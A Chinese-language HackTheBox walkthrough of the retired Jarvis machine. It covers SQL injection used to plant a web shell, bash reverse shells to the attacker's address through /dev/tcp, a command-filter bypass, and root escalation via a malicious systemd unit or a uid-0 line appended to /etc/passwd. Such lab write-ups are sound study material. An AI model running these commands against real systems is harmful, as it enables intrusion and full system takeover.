HTB-靶机-Jarvis

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.143

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.143 -o ./Jarvis-autorecon

访问web应用测试发现存在SQL注入

直接写入一句话

通过一句话执行命令
curl -X POST http://10.10.10.143/bmfx.php --data-urlencode exec=whoami

测试没问题直接反弹shell

curl -X POST http://10.10.10.143/bmfx.php --data-urlencode 'exec=bash -c "bash -i >& /dev/tcp/10.10.14.3/8833 0>&1"'

拿到低权限shell之后执行sudo -l

发现了一个python脚本，可以执行ping命令，看了代码过滤了一些常见的命令执行参数，这里可以通过$()进行绕过

切换到用户pepper但是无法回显，使用nc反弹shell然后写入kali的公钥，使用公钥去连接目标普通用户

本地kali 去连接

查找权限是4000的文件
find / -perm -4000 2>/dev/null

发现可以通过systemctl进行提权

systemctl提权
https://www.freedesktop.org/software/systemd/man/systemctl.html
https://gtfobins.github.io/gtfobins/systemctl/

echo 'bash -c "bash -i >& /dev/tcp/10.10.14.3/8855 0>&1"' > /tmp/shit.sh

或者直接添加uid为0的用户/tmp/shit.sh
/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
密码为AAAA

chmod +x /tmp/shit.sh

cd /home/pepper
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "/tmp/shit.sh"
[Install]
WantedBy=multi-user.target' > bmfxshitd.service
systemctl link /tmp/bmfxshitd.service
systemctl start bmfxshitd.service